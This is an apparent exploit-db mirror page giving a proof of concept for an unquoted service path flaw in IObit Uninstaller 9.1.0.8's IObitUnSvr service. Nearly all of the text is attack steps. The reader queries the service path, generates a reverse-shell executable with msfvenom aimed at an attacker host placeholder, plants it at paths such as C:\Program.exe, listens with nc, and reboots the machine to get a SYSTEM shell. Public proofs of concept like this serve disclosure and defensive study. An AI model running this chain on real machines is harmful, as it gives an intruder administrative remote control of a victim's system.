IObit Uninstaller 9.1.0.8 - 'IObitUnSvr' Unquoted Service Path

https://awesome.hackpuntes.com/exploit-db/iobit-uninstaller-9.1.0.8-iobitunsvr-unquoted-service-path

FILES

Vulnerable software

POC

  1. Install vulnerable software

  2. Windows + R and type cmd

  3. Execute command sc qc IObitUnSvr

  4. BINARY_PATH_NAME contains spaces and isn’t enclosed within quotes

  5. Make a malicious exemsfvenom -p windows/shell_reverse_tcp LHOST=[IP-ATTACKER] LPORT=[PORT-ATTACKER] -f exe -o IObit.exe

  6. Copy a malicious exe in some path like the following

    1. C:\Program.exe

    2. C:\Program Files.exe

    3. C:\Program Files (x86)\IObit\IObit.exe

  7. Listen on attacker machine nc -lvnp 5555

  8. Reboot victim system

  9. When the victim machine reboots, you will get a reverse shell with admin system privileges

ORIGINAL

Last updated

Was this helpful?